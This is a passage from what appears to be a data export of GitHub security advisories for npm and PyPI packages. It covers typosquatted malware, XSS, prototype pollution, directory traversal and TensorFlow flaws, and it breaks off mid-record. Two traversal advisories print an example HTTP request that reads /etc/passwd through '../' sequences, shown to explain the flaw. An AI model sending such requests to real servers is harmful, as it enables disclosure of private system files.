+1.4.0,GHSA-vm7j-4rj6-mw2p,2021-09-29T20:46:35Z,2020-09-03T21:08:42Z,,[],Malicious Package in ember_cli_babe,"Version 6.16.0 of `ember_cli_babe` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ember_cli_babe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1200'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f8h3-rqrm-47v9,2020-08-31T18:36:15Z,2020-09-02T16:02:40Z,,[],Prototype Pollution in smart-extend,"All versions of `smart-extend` are vulnerable to Prototype Pollution. The `deep()` function allows attackers to modify the prototype of Object causing the addition or modification of an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'smart-extend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/438274'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/801'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:36:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pqpp-2363-649v,2020-08-31T18:36:36Z,2020-09-02T18:22:30Z,,[],Cross-Site Scripting in buttle,"All versions of `buttle` are vulnerable to Cross-Site Scripting. Due to misconfiguration of its rendering engine, `buttle` does not sanitize the HTML output allowing attackers to run arbitrary JavaScript when processing malicious markdown files.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.
+",[],"[{'package': {'ecosystem': 'npm', 'name': 'buttle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/404126'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/810'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:36:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vm67-mh96-95mq,2021-09-29T20:53:43Z,2020-09-03T21:40:48Z,,[],Malicious Package in bubfer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bubfer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1232'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9mqp-7v2h-2382,2021-08-26T15:10:19Z,2020-09-25T18:28:19Z,,['CVE-2020-15194'],Denial of Service in Tensorflow,"### Impact
+The `SparseFillEmptyRowsGrad` implementation has incomplete validation of the shapes of its arguments:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L235-L241
+
+Although `reverse_index_map_t` and `grad_values_t` are accessed in a similar pattern, only `reverse_index_map_t` is validated to be of proper shape. Hence, malicious users can pass a bad `grad_values_t` to trigger an assertion failure in `vec`, causing denial of service in serving installations.
+
+### Patches
+We have patched the issue in 390611e0d45c5793c7066110af37c8514e6a6c54 and will release a patch release for all affected versions.
+
+We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability is a variant of [GHSA-63xm-rx5p-xvqr](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-63xm-rx5p-xvqr)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9mqp-7v2h-2382'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15194'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/390611e0d45c5793c7066110af37c8514e6a6c54'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-20', 'CWE-617'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T16:38:49Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-hjmq-236j-8m87,2021-08-26T15:19:56Z,2020-09-25T18:28:53Z,,['CVE-2020-15213'],Denial of service in tensorflow-lite,"### Impact
+In TensorFlow Lite models using segment sum can trigger a denial of service by causing an out of memory allocation in the implementation of segment sum. Since code uses the last element of the tensor holding them to determine the dimensionality of output tensor, attackers can use a very large value to trigger a large allocation:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/segment_sum.cc#L39-L44
+
+### Patches
+We have patched the issue in 204945b and will release patch releases for all affected versions.
+
+We recommend users to upgrade to TensorFlow 2.2.1, or 2.3.1.
+
+### Workarounds
+A potential workaround would be to add a custom `Verifier` to limit the maximum value in the segment ids tensor. This only handles the case when the segment ids are stored statically in the model, but a similar validation could be done if the segment ids are generated at runtime, between inference steps.
+
+However, if the segment ids are generated as outputs of a tensor during inference steps, then there are no possible workaround and users are advised to upgrade to patched code.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been discovered from a variant analysis of [GHSA-p2cq-cprg-frvm](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p2cq-cprg-frvm).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-hjmq-236j-8m87'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15213'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/204945b19e44b57906c9344c0d00120eeeae178a'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}]","{'cwe_ids': ['CWE-119', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T18:22:48Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-f294-27fc-wgj7,2021-09-29T21:25:27Z,2020-09-03T22:16:31Z,,[],Malicious Package in buffer-zor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-zor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1255'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c53x-wwx2-pg96,2021-09-28T17:27:43Z,2020-09-03T17:03:58Z,,[],Cross-Site Scripting in @berslucas/liljs,"Versions of `@berslucas/liljs` prior to 1.0.2 are vulnerable to Cross-Site Scripting (XSS). The package uses the unsafe `innerHTML` function without sanitizing input, which may allow attackers to execute arbitrary JavaScript on the victim's browser.
+
+
+## Recommendation
+
+Upgrade to version 1.0.2 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@berslucas/liljs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/bersLucas/liljs/pull/7'}, {'type': 'WEB', 'url': 'https://github.com/bersLucas/liljs/commit/779c0dcd8aba434a1c94db7d1d2d990a629f9a6c'}, {'type': 'PACKAGE', 'url': 'https://github.com/bersLucas/liljs'}, {'type': 'WEB', 'url': 'https://github.com/bersLucas/liljs/releases/tag/1.0.2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-BERSLUCASLILJS-450217'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1016'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:14Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w7jg-972m-rphv,2023-09-12T21:23:58Z,2020-09-01T18:17:28Z,,['CVE-2017-16199'],Directory Traversal in susu-sum,"Affected versions of `susu-sum` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'susu-sum'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16199'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/susu-sum'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/429'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xw79-hhv6-578c,2021-09-28T16:54:33Z,2020-09-11T21:16:59Z,,[],Cross-Site Scripting in serve,"Versions of `serve` prior to 10.0.2 are vulnerable to Cross-Site Scripting (XSS). The package does not encode output, allowing attackers to execute arbitrary JavaScript in the victim's browser if user-supplied input is rendered.
+
+
+## Recommendation
+
+Upgrade to version 10.0.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'serve'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zeit/serve-handler/commit/65b4d4183a31a8076c78c40118acb0ca1b64f620'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/358641'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/398285'}, {'type': 'PACKAGE', 'url': 'https://github.com/zeit/serve-handler'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/971'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:42:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5fm9-jmv7-fcx5,2021-10-01T13:47:05Z,2020-09-02T18:35:26Z,,[],Malicious Package in asynnc,"All versions of `asynnc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'asynnc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/842'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-23vw-mhv5-grv5,2020-08-31T19:00:56Z,2020-09-03T15:48:43Z,,[],Denial of Service in @hapi/hapi,"Versions of `@hapi/hapi` prior to 18.4.1 or 19.1.1 are vulnerable to Denial of Service. The CORS request handler has a vulnerability which will cause the function to throw a system error if the header contains some invalid values. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services.
+
+
+## Recommendation
+
+Upgrade to versions 18.4.1, 19.1.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@hapi/hapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '18.4.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@hapi/hapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '19.0.0'}, {'fixed': '19.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1482'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:56Z', 'nvd_published_at': None}"
+1.4.0,GHSA-76qf-6mvw-c5hm,2021-09-30T20:16:45Z,2020-09-03T19:45:42Z,,[],Malicious Package in js-base64-int,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-base64-int'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1128'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x3m6-rprw-862w,2021-09-30T19:50:50Z,2020-09-03T17:43:31Z,,[],Malicious Package in node-buc,"All versions of `node-buc` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-buc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1059'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:47Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v45m-2wcp-gg98,2020-08-31T18:59:19Z,2020-09-04T17:18:44Z,,[],Global node_modules Binary Overwrite in bin-links,"Versions of `bin-links` prior to 1.1.6 are vulnerable to a Global node_modules Binary Overwrite. It fails to prevent globally-installed binaries to be overwritten by other package installs. For example, if a package was installed globally and created a `serve` binary, any subsequent installs of packages that also create a `serve` binary would overwrite the first binary. This behavior is still allowed in local installations.
+
+
+## Recommendation
+
+Upgrade to version 1.1.6 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'bin-links'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.6'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1438'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wv39-cgmm-cq29,2021-09-29T21:27:19Z,2020-09-03T22:23:00Z,,[],Malicious Package in buffmr-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffmr-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1261'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5mrr-rgp6-x4gr,2020-08-31T18:48:01Z,2020-09-03T19:39:05Z,,[],Command Injection in marsdb,"All versions of `marsdb` are vulnerable to Command Injection. In the `DocumentMatcher` class, selectors on `$where` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'marsdb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/bkimminich/juice-shop/issues/1173'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1122'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hpw4-m59j-9p52,2023-09-13T20:25:57Z,2020-09-01T17:29:13Z,,['CVE-2017-16163'],Directory Traversal in dylmomo,"Affected versions of `dylmomo` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dylmomo'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16163'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/dylmomo'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/396'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7xf9-74cp-8hx3,2021-09-30T17:00:58Z,2020-09-03T22:59:21Z,,[],Malicious Package in js-cha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-cha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1281'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g5q2-fcg9-j526,2021-09-30T19:46:50Z,2020-09-03T17:40:18Z,,[],Malicious Package in hsf-clients,"All versions of `hsf-clients` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'hsf-clients'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1054'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cvpc-8phh-8f45,2021-08-26T15:19:42Z,2020-09-25T18:28:49Z,,['CVE-2020-15211'],Out of bounds access in tensorflow-lite,"### Impact
+In TensorFlow Lite, saved models in the flatbuffer format use a double indexing scheme: a model has a set of subgraphs, each subgraph has a set of operators and each operator has a set of input/output tensors. The flatbuffer format uses indices for the tensors, indexing into an array of tensors that is owned by the subgraph. This results in a pattern of double array indexing when trying to get the data of each tensor:https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/kernel_util.cc#L36
+
+However, some operators can have some tensors be optional. To handle this scenario, the flatbuffer model uses a negative `-1` value as index for these tensors:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/c/common.h#L82
+
+This results in special casing during validation at model loading time: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/core/subgraph.cc#L566-L580
+
+Unfortunately, this means that the `-1` index is a valid tensor index for any operator, including those that don't expect optional inputs and including for output tensors. Thus, this allows writing and reading from outside the bounds of heap allocated arrays, although only at a specific offset from the start of these arrays.
+
+This results in both read and write gadgets, albeit very limited in scope.
+
+### Patches
+We have patched the issue in several commits (46d5b0852, 00302787b7, e11f5558, cd31fd0ce, 1970c21, and fff2c83). We will release patch releases for all versions between 1.15 and 2.3.
+
+We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
+
+### Workarounds
+A potential workaround would be to add a custom `Verifier` to the model loading code to ensure that only operators which accept optional inputs use the `-1` special value and only for the tensors that they expect to be optional. Since this allow-list type approach is erro-prone, we advise upgrading to the patched code.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cvpc-8phh-8f45'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15211'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/00302787b788c5ff04cb6f62aed5a74d936e86c0'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1970c2158b1ffa416d159d03c3370b9a462aee35'}, {'type': 'WEB', 'url': 